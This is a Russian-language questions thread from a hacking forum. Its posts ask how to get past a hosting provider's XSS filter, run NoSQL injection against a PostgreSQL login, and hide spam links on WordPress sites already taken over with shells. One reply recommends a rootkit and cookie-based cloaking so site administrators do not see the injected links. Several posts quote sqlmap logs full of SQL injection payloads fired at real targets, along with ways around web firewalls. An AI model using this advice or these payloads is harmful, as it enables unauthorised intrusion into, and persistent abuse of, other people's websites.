• XSS.stack #1 – первый литературный журнал от юзеров форума

[web-hacking] Ваши вопросы

При добавление тега <script> в html страницу Goddady блочит запрос.
Block ID: XSS014
Block reason: An attempted XSS (Cross site scripting) was detected and blocked.

Раньше проставлялось всё нормально, но щас фиксанули, что можете посоветовать что б обойти это?
 
Есть вопрос. Провожу тестирование формы логина ( входа )
Когда ввел данные и отправил запрос , он отправляется с помощью Rest Api , данные которые я ввел находятся в теле формате JSON
Само веб-приложение использует POSTGREsql , но после долгих чтений документаций и книг по пентесту API понял что Postgre также может использовать nosql формата базы данных.
Прочитал что под mongodb nosql используют инъекции с такими операторами $eq , $gt , $lt , $ne
Но так и не нашел какие операторы использует POSTGRESQL в формате базы данных nosql ( jsonb )
Подскажите кто знает как мне сделать nosql injection для базы данных POSTGRE , если отправляется запрос в формате JSON
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Задался интересным вопросом, возможно не по теме, но в топике этом 90% вопросов про скули, ребята их раскрутят, а дальше пропадают, у меня вопрос а куда они делить потом, потому что дальше продвигаться на мой взгляд сложнее и опыта нужно больше, а вопросов, что делать дальше даже не встречал
 
Задался интересным вопросом, возможно не по теме, но в топике этом 90% вопросов про скули, ребята их раскрутят, а дальше пропадают, у меня вопрос а куда они делить потом, потому что дальше продвигаться на мой взгляд сложнее и опыта нужно больше, а вопросов, что делать дальше даже не встречал
Многие работают только по мыло+пасс
И да дальше сложнее, скуля на самом деле нужна лишь для того чтобы стащить админа, потом ещё нужно найти админку и расшифровать пароль, залить шел и дальше больше
 
Добрый день, подскажите/посоветуйте, есть шеллы, сайты на wordpress, будем проставлять ссылки на свои сайты. Есть пару вопросов:
1) какое лучшее решение на сегодня по размещению кода? в шаблоне, есть риск удаления при обновлении темы; читал на форуме, что есть решение как засунуть в движок wordpress.
2) каким образом лучше скрыть видимость ссыли для админа/пользователей. CSS в цвет фона, вроде гугл понимает это и может пессимизировать, через javascript, какие решения посоветуете? Узнал что некоторые умельцы считают сумму чисел в javascript и сумма будет <div id="" - и только после этого стиль подгружает...

Обсудим?
 
Добрый день, подскажите/посоветуйте, есть шеллы, сайты на wordpress, будем проставлять ссылки на свои сайты. Есть пару вопросов:
1) какое лучшее решение на сегодня по размещению кода? в шаблоне, есть риск удаления при обновлении темы; читал на форуме, что есть решение как засунуть в движок wordpress.
2) каким образом лучше скрыть видимость ссыли для админа/пользователей. CSS в цвет фона, вроде гугл понимает это и может пессимизировать, через javascript, какие решения посоветуете? Узнал что некоторые умельцы считают сумму чисел в javascript и сумма будет <div id="" - и только после этого стиль подгружает...

Обсудим?
1) Лучшее решение - руткит на сервере с проверкой контрольных сумм файлов: обновляется файл с кодом - заменяешь его. Быдло-решения - проверка внешними скриптами наличие ссылок на сайте + если убраны - теми же скриптами их обновляешь (как работали олдскул ифреймеры), пока доступы не сдохнут. Ты можешь заказать скрипты для Зеннопостера за копейки с этим функционалом.
2) Клоачь админов по куки - отдавай им контент без инжекта. В случае ссылок: не имеет смысла клоачить пользователей и поисковых ботов, т.к. если ссылки не будут в индексе и по ним не буде тпереходов, то зачем ты их ставишь, лол?

Обрати внимание на количество подключаемых js-библиотек у любого обычного сайта - с стандартной cms или самописной - как ты себе представляешь алгоритм анализа туевой хучи этого говнокода? Скрипт клоаки - js, дальше инжект дивов. Ссылки под цвет фона - это детский сад в 2023 году.
 
1) Лучшее решение - руткит на сервере с проверкой контрольных сумм файлов: обновляется файл с кодом - заменяешь его. Быдло-решения - проверка внешними скриптами наличие ссылок на сайте + если убраны - теми же скриптами их обновляешь (как работали олдскул ифреймеры), пока доступы не сдохнут. Ты можешь заказать скрипты для Зеннопостера за копейки с этим функционалом.
2) Клоачь админов по куки - отдавай им контент без инжекта. В случае ссылок: не имеет смысла клоачить пользователей и поисковых ботов, т.к. если ссылки не будут в индексе и по ним не буде тпереходов, то зачем ты их ставишь, лол?

Обрати внимание на количество подключаемых js-библиотек у любого обычного сайта - с стандартной cms или самописной - как ты себе представляешь алгоритм анализа туевой хучи этого говнокода? Скрипт клоаки - js, дальше инжект дивов. Ссылки под цвет фона - это детский сад в 2023 году.
Просматривается любовь к зеннопостеру :)
 
Люди пожалуйста, помогите наконец то разобратся((( на 3 целях одно и тоже пайлод идет норм но как идет появляется символ " ' " , сыпит на этот символ ошибка 500 , пробовал его запаковывать ничего не получается, что делать??

Код:
[01:53:45] [PAYLOAD] 1",.(.',)(,
[01:53:46] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[01:53:46] [INFO] heuristic (basic) test shows that URI parameter '#1*' might be injectable (possible DBMS: 'MySQL')
[01:53:46] [PAYLOAD] 1'IitGnV<'">IKOQYW
[01:53:46] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[01:53:46] [INFO] heuristic (XSS) test shows that URI parameter '#1*' might be vulnerable to cross-site scripting (XSS) attacks


Код:
[01:54:14] [PAYLOAD] 1') AND (SELECT 7188 FROM (SELECT(SLEEP(10)))LtxN)-- gcJk
[01:54:15] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[01:54:15] [PAYLOAD] 1' AND (SELECT 7188 FROM (SELECT(SLEEP(10)))LtxN)-- tHmF
[01:54:15] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[01:54:15] [PAYLOAD] 1" AND (SELECT 7188 FROM (SELECT(SLEEP(10)))LtxN)-- SltN
[01:54:16] [PAYLOAD] 1) AND (SELECT 7188 FROM (SELECT(SLEEP(10)))LtxN) AND (1282 BETWEEN 1282 AND 1282
[01:54:16] [PAYLOAD] 1)) AND (SELECT 7188 FROM (SELECT(SLEEP(10)))LtxN) AND ((9502 BETWEEN 9502 AND 9502
[01:54:17] [PAYLOAD] 1))) AND (SELECT 7188 FROM (SELECT(SLEEP(10)))LtxN) AND (((6051 BETWEEN 6051 AND 6051
[01:54:18] [PAYLOAD] 1 AND (SELECT 7188 FROM (SELECT(SLEEP(10)))LtxN)
[01:54:19] [PAYLOAD] 1') AND (SELECT 7188 FROM (SELECT(SLEEP(10)))LtxN) AND ('TLPt'='TLPt
[01:54:19] [DEBUG] got HTTP error code: 500 ('Internal Server Error')


Ну или подскажите , что делать чем проверить , как обойти , --error-cede=500 не помогает
За ранее всем спасибо!
 
Люди пожалуйста, помогите наконец то разобратся((( на 3 целях одно и тоже пайлод идет норм но как идет появляется символ " ' " , сыпит на этот символ ошибка 500 , пробовал его запаковывать ничего не получается, что делать??

Код:
[01:53:45] [PAYLOAD] 1",.(.',)(,
[01:53:46] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[01:53:46] [INFO] heuristic (basic) test shows that URI parameter '#1*' might be injectable (possible DBMS: 'MySQL')
[01:53:46] [PAYLOAD] 1'IitGnV<'">IKOQYW
[01:53:46] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[01:53:46] [INFO] heuristic (XSS) test shows that URI parameter '#1*' might be vulnerable to cross-site scripting (XSS) attacks


Код:
[01:54:14] [PAYLOAD] 1') AND (SELECT 7188 FROM (SELECT(SLEEP(10)))LtxN)-- gcJk
[01:54:15] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[01:54:15] [PAYLOAD] 1' AND (SELECT 7188 FROM (SELECT(SLEEP(10)))LtxN)-- tHmF
[01:54:15] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[01:54:15] [PAYLOAD] 1" AND (SELECT 7188 FROM (SELECT(SLEEP(10)))LtxN)-- SltN
[01:54:16] [PAYLOAD] 1) AND (SELECT 7188 FROM (SELECT(SLEEP(10)))LtxN) AND (1282 BETWEEN 1282 AND 1282
[01:54:16] [PAYLOAD] 1)) AND (SELECT 7188 FROM (SELECT(SLEEP(10)))LtxN) AND ((9502 BETWEEN 9502 AND 9502
[01:54:17] [PAYLOAD] 1))) AND (SELECT 7188 FROM (SELECT(SLEEP(10)))LtxN) AND (((6051 BETWEEN 6051 AND 6051
[01:54:18] [PAYLOAD] 1 AND (SELECT 7188 FROM (SELECT(SLEEP(10)))LtxN)
[01:54:19] [PAYLOAD] 1') AND (SELECT 7188 FROM (SELECT(SLEEP(10)))LtxN) AND ('TLPt'='TLPt
[01:54:19] [DEBUG] got HTTP error code: 500 ('Internal Server Error')


Ну или подскажите , что делать чем проверить , как обойти , --error-cede=500 не помогает
За ранее всем спасибо!
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Люди пожалуйста, помогите наконец то разобратся((( на 3 целях одно и тоже пайлод идет норм но как идет появляется символ " ' " , сыпит на этот символ ошибка 500 , пробовал его запаковывать ничего не получается, что делать??

Код:
[01:53:45] [PAYLOAD] 1",.(.',)(,
[01:53:46] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[01:53:46] [INFO] heuristic (basic) test shows that URI parameter '#1*' might be injectable (possible DBMS: 'MySQL')
[01:53:46] [PAYLOAD] 1'IitGnV<'">IKOQYW
[01:53:46] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[01:53:46] [INFO] heuristic (XSS) test shows that URI parameter '#1*' might be vulnerable to cross-site scripting (XSS) attacks


Код:
[01:54:14] [PAYLOAD] 1') AND (SELECT 7188 FROM (SELECT(SLEEP(10)))LtxN)-- gcJk
[01:54:15] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[01:54:15] [PAYLOAD] 1' AND (SELECT 7188 FROM (SELECT(SLEEP(10)))LtxN)-- tHmF
[01:54:15] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[01:54:15] [PAYLOAD] 1" AND (SELECT 7188 FROM (SELECT(SLEEP(10)))LtxN)-- SltN
[01:54:16] [PAYLOAD] 1) AND (SELECT 7188 FROM (SELECT(SLEEP(10)))LtxN) AND (1282 BETWEEN 1282 AND 1282
[01:54:16] [PAYLOAD] 1)) AND (SELECT 7188 FROM (SELECT(SLEEP(10)))LtxN) AND ((9502 BETWEEN 9502 AND 9502
[01:54:17] [PAYLOAD] 1))) AND (SELECT 7188 FROM (SELECT(SLEEP(10)))LtxN) AND (((6051 BETWEEN 6051 AND 6051
[01:54:18] [PAYLOAD] 1 AND (SELECT 7188 FROM (SELECT(SLEEP(10)))LtxN)
[01:54:19] [PAYLOAD] 1') AND (SELECT 7188 FROM (SELECT(SLEEP(10)))LtxN) AND ('TLPt'='TLPt
[01:54:19] [DEBUG] got HTTP error code: 500 ('Internal Server Error')


Ну или подскажите , что делать чем проверить , как обойти , --error-cede=500 не помогает
За ранее всем спасибо!
Пробовал tamper=apostrophemask ?
 
подскажите плиз кто сталкивался
[05:24:27] [INFO] checking if the target is protected by some kind of WAF/IPS
[05:24:28] [CRITICAL] WAF/IPS identified as 'ASP.NET RequestValidationMode (Microsoft)'

при -v3 ошибок никаких не выдает кроме как иногда
Код:
[05:15:15] [DEBUG] SSL connection error occurred for 'PROTOCOL_TLSv1_1' ('error: A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond')
может есть тампер какой или другие решения
в конце вот

Код:
[06:10:05] [INFO] URI parameter '#1*' appears to be 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
[06:10:05] [INFO] testing 'Generic inline queries'
[06:10:07] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[06:10:08] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[06:11:26] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'
[06:12:41] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'
[06:13:18] [INFO] testing 'Generic UNION query (random number) - 21 to 40 columns'
[06:13:51] [INFO] testing 'Generic UNION query (NULL) - 41 to 60 columns'
[06:14:27] [INFO] testing 'Generic UNION query (random number) - 41 to 60 columns'
[06:15:26] [INFO] testing 'Generic UNION query (NULL) - 61 to 80 columns'
[06:16:04] [INFO] testing 'Generic UNION query (random number) - 61 to 80 columns'
[06:16:46] [INFO] testing 'Generic UNION query (NULL) - 81 to 100 columns'
[06:17:40] [INFO] testing 'Generic UNION query (random number) - 81 to 100 columns'
[06:18:37] [INFO] checking if the injection point on URI parameter '#1*' is a false positive
[06:18:40] [WARNING] false positive or unexploitable injection point detected
[06:18:40] [WARNING] URI parameter '#1*' does not seem to be injectable
[06:18:40] [CRITICAL] all tested parameters do not appear to be injectable
[06:18:40] [WARNING] HTTP error codes detected during run:

Левел до 5 увеличивал, не помогло
может сама скуля фальш?
 
Кто может подсказать как расшифровывать стегу(текст спрятанный в фото)? часто вижу в тасках на трайхакми,но не могу ничего с этим сделать,и гугл особо не помогает
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх